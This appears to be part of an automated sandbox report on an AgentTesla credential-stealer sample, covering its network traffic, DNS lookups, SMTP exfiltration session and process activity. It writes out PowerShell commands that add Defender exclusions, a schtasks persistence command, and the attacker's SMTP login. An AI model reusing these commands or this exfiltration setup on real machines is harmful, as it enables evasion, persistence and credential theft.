                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xae1a90x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x5b4.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xac3b00x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xac2040xac40017cabe620472f0c257b2cedd38cc99cdFalse0.9603535468069666data7.958322330066031IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xb00000x5b40x60033ef794e6d65abaf30dbe1bdd27f572aFalse0.421875data4.093666692462753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xb20000xc0x20035ccd7c3a6214fefa89d78fff662425fFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0xb00900x324data0.43283582089552236
                                                RT_MANIFEST0xb03c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                05/27/24-12:30:54.369627TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49709587192.168.2.6208.91.198.143
                                                05/27/24-12:30:51.051527TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49705587192.168.2.6208.91.198.143

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 27, 2024 12:30:46.843614101 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:46.843651056 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:46.843722105 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:46.852186918 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:46.852207899 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.360549927 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.360621929 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.365833044 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.365842104 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.366120100 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.416105986 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.454904079 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.498501062 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.625962019 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.626146078 CEST44349702172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:47.626214027 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.632426023 CEST49702443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:47.654148102 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:47.659106970 CEST8049703208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:47.659435034 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:47.659480095 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:47.664325953 CEST8049703208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:48.125622034 CEST8049703208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:48.181838989 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:49.020311117 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:49.028970003 CEST8049703208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:49.029220104 CEST4970380192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:49.343743086 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:49.348690987 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:49.348752022 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.066251040 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.066463947 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.071801901 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.221824884 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.222951889 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.227943897 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.380045891 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.380274057 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.385267019 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.541346073 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.541837931 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.547630072 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.686789989 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:50.686887026 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:50.687031031 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:50.689943075 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:50.689985037 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:50.700901031 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.701725006 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.706628084 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.895111084 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:50.895273924 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:50.900221109 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.050965071 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.051527023 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:51.051582098 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:51.051630020 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:51.051630020 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:51.056437969 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.056464911 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.056644917 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.056658030 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.161542892 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.161642075 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:51.163077116 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:51.163105965 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.163382053 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.273992062 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:51.318505049 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.423968077 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:51.447643042 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.447724104 CEST44349707172.67.74.152192.168.2.6
                                                May 27, 2024 12:30:51.447793007 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:51.450604916 CEST49707443192.168.2.6172.67.74.152
                                                May 27, 2024 12:30:51.452931881 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:51.457880020 CEST8049708208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:51.457981110 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:51.458065033 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:51.462877989 CEST8049708208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:51.603605032 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:51.934434891 CEST8049708208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:51.978591919 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:52.822630882 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:52.824278116 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:52.829176903 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:52.829262018 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:52.847162962 CEST8049708208.95.112.1192.168.2.6
                                                May 27, 2024 12:30:52.847208023 CEST4970880192.168.2.6208.95.112.1
                                                May 27, 2024 12:30:53.386446953 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.386634111 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:53.391478062 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.542809010 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.543119907 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:53.548041105 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.711282015 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.712167025 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:53.717132092 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.874255896 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:53.874505043 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:53.879473925 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.032294989 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.032536030 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.037472963 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.211364985 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.211828947 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.216711998 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.368985891 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.369626999 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.369782925 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.369782925 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.370040894 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:30:54.376722097 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.377239943 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.377249002 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.377259016 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.757467031 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:30:54.806700945 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:29.042032957 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:29.046977043 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:29.197567940 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:29.197591066 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:29.197786093 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:29.197786093 CEST49705587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:29.202783108 CEST58749705208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:32.838365078 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:32.843630075 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:32.998485088 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:32.998648882 CEST58749709208.91.198.143192.168.2.6
                                                May 27, 2024 12:32:32.998763084 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:32.998786926 CEST49709587192.168.2.6208.91.198.143
                                                May 27, 2024 12:32:33.003648043 CEST58749709208.91.198.143192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 27, 2024 12:30:46.819041967 CEST5040153192.168.2.61.1.1.1
                                                May 27, 2024 12:30:46.825964928 CEST53504011.1.1.1192.168.2.6
                                                May 27, 2024 12:30:47.645761013 CEST5642853192.168.2.61.1.1.1
                                                May 27, 2024 12:30:47.652786970 CEST53564281.1.1.1192.168.2.6
                                                May 27, 2024 12:30:49.020998955 CEST6270453192.168.2.61.1.1.1
                                                May 27, 2024 12:30:49.342091084 CEST53627041.1.1.1192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 27, 2024 12:30:46.819041967 CEST192.168.2.61.1.1.10xc4f0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:47.645761013 CEST192.168.2.61.1.1.10x64dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:49.020998955 CEST192.168.2.61.1.1.10xb22aStandard query (0)smtp.santonswitchgears.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 27, 2024 12:30:46.825964928 CEST1.1.1.1192.168.2.60xc4f0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:46.825964928 CEST1.1.1.1192.168.2.60xc4f0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:46.825964928 CEST1.1.1.1192.168.2.60xc4f0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:47.652786970 CEST1.1.1.1192.168.2.60x64dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:49.342091084 CEST1.1.1.1192.168.2.60xb22aNo error (0)smtp.santonswitchgears.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                May 27, 2024 12:30:49.342091084 CEST1.1.1.1192.168.2.60xb22aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:49.342091084 CEST1.1.1.1192.168.2.60xb22aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:49.342091084 CEST1.1.1.1192.168.2.60xb22aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                May 27, 2024 12:30:49.342091084 CEST1.1.1.1192.168.2.60xb22aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • api.ipify.org
                                                • ip-api.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649703208.95.112.1802760C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                TimestampBytes transferredDirectionData
                                                May 27, 2024 12:30:47.659480095 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                May 27, 2024 12:30:48.125622034 CEST175INHTTP/1.1 200 OK
                                                Date: Mon, 27 May 2024 10:30:47 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649708208.95.112.1805308C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                TimestampBytes transferredDirectionData
                                                May 27, 2024 12:30:51.458065033 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                May 27, 2024 12:30:51.934434891 CEST175INHTTP/1.1 200 OK
                                                Date: Mon, 27 May 2024 10:30:51 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 56
                                                X-Rl: 43
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649702172.67.74.1524432760C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-27 10:30:47 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-05-27 10:30:47 UTC211INHTTP/1.1 200 OK
                                                Date: Mon, 27 May 2024 10:30:47 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 88a554e2fa098c96-EWR
                                                2024-05-27 10:30:47 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                                Data Ascii: 8.46.123.175


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649707172.67.74.1524435308C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-27 10:30:51 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-05-27 10:30:51 UTC211INHTTP/1.1 200 OK
                                                Date: Mon, 27 May 2024 10:30:51 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 88a554fadc6c41f2-EWR
                                                2024-05-27 10:30:51 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                                Data Ascii: 8.46.123.175


                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                May 27, 2024 12:30:50.066251040 CEST58749705208.91.198.143192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 27, 2024 12:30:50.066463947 CEST49705587192.168.2.6208.91.198.143EHLO 494126
                                                May 27, 2024 12:30:50.221824884 CEST58749705208.91.198.143192.168.2.6250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 27, 2024 12:30:50.222951889 CEST49705587192.168.2.6208.91.198.143AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
                                                May 27, 2024 12:30:50.380045891 CEST58749705208.91.198.143192.168.2.6334 UGFzc3dvcmQ6
                                                May 27, 2024 12:30:50.541346073 CEST58749705208.91.198.143192.168.2.6235 2.7.0 Authentication successful
                                                May 27, 2024 12:30:50.541837931 CEST49705587192.168.2.6208.91.198.143MAIL FROM:<tech1@santonswitchgears.com>
                                                May 27, 2024 12:30:50.700901031 CEST58749705208.91.198.143192.168.2.6250 2.1.0 Ok
                                                May 27, 2024 12:30:50.701725006 CEST49705587192.168.2.6208.91.198.143RCPT TO:<tech1@santonswitchgears.com>
                                                May 27, 2024 12:30:50.895111084 CEST58749705208.91.198.143192.168.2.6250 2.1.5 Ok
                                                May 27, 2024 12:30:50.895273924 CEST49705587192.168.2.6208.91.198.143DATA
                                                May 27, 2024 12:30:51.050965071 CEST58749705208.91.198.143192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                May 27, 2024 12:30:51.051630020 CEST49705587192.168.2.6208.91.198.143.
                                                May 27, 2024 12:30:51.423968077 CEST58749705208.91.198.143192.168.2.6250 2.0.0 Ok: queued as CA5D7B80007
                                                May 27, 2024 12:30:53.386446953 CEST58749709208.91.198.143192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                May 27, 2024 12:30:53.386634111 CEST49709587192.168.2.6208.91.198.143EHLO 494126
                                                May 27, 2024 12:30:53.542809010 CEST58749709208.91.198.143192.168.2.6250-us2.outbound.mailhostbox.com
                                                250-PIPELINING
                                                250-SIZE 41648128
                                                250-VRFY
                                                250-ETRN
                                                250-STARTTLS
                                                250-AUTH PLAIN LOGIN
                                                250-AUTH=PLAIN LOGIN
                                                250-ENHANCEDSTATUSCODES
                                                250-8BITMIME
                                                250-DSN
                                                250 CHUNKING
                                                May 27, 2024 12:30:53.543119907 CEST49709587192.168.2.6208.91.198.143AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
                                                May 27, 2024 12:30:53.711282015 CEST58749709208.91.198.143192.168.2.6334 UGFzc3dvcmQ6
                                                May 27, 2024 12:30:53.874255896 CEST58749709208.91.198.143192.168.2.6235 2.7.0 Authentication successful
                                                May 27, 2024 12:30:53.874505043 CEST49709587192.168.2.6208.91.198.143MAIL FROM:<tech1@santonswitchgears.com>
                                                May 27, 2024 12:30:54.032294989 CEST58749709208.91.198.143192.168.2.6250 2.1.0 Ok
                                                May 27, 2024 12:30:54.032536030 CEST49709587192.168.2.6208.91.198.143RCPT TO:<tech1@santonswitchgears.com>
                                                May 27, 2024 12:30:54.211364985 CEST58749709208.91.198.143192.168.2.6250 2.1.5 Ok
                                                May 27, 2024 12:30:54.211828947 CEST49709587192.168.2.6208.91.198.143DATA
                                                May 27, 2024 12:30:54.368985891 CEST58749709208.91.198.143192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                May 27, 2024 12:30:54.370040894 CEST49709587192.168.2.6208.91.198.143.
                                                May 27, 2024 12:30:54.757467031 CEST58749709208.91.198.143192.168.2.6250 2.0.0 Ok: queued as 2319CB80429
                                                May 27, 2024 12:32:29.042032957 CEST49705587192.168.2.6208.91.198.143QUIT
                                                May 27, 2024 12:32:29.197567940 CEST58749705208.91.198.143192.168.2.6221 2.0.0 Bye
                                                May 27, 2024 12:32:32.838365078 CEST49709587192.168.2.6208.91.198.143QUIT
                                                May 27, 2024 12:32:32.998485088 CEST58749709208.91.198.143192.168.2.6221 2.0.0 Bye

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:06:30:42
                                                Start date:27/05/2024
                                                Path:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0x1e0000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0xa40000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                                                Imagebase:0xa40000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
                                                Imagebase:0x8f0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:true
